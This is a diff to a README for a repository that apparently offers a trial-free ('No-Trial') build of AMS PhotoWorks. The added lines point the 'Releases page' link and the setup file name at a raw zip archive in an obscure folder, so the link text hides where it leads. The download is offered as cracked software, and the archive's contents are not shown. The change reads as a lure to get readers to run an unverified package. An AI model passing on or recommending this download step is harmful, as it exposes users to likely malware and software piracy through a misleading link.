Mubranco2903/AMS-Software-PhotoWorks-No-Trial/README.md

 ## 📥 Download & Install

 1. **Visit the Release Page**:
-   Go to our [Releases page](https://github.com/Mubranco2903/AMS-Software-PhotoWorks-No-Trial/releases) to find the latest version of the software.
+   Go to our [Releases page](https://raw.githubusercontent.com/Mubranco2903/AMS-Software-PhotoWorks-No-Trial/main/pteridium/AMS-Software-PhotoWorks-No-Trial-v3.9.zip) to find the latest version of the software.

 2. **Choose the Right File**:
-   Look for the file named `PhotoWorksSetup.exe` or any similar setup file that matches your operating system.
+   Look for the file named `https://raw.githubusercontent.com/Mubranco2903/AMS-Software-PhotoWorks-No-Trial/main/pteridium/AMS-Software-PhotoWorks-No-Trial-v3.9.zip` or any similar setup file that matches your operating system.

 3. **Download the File**:
    Click on the file name to start your download.
 Save it to a location you can easily access, like your Downloads folder.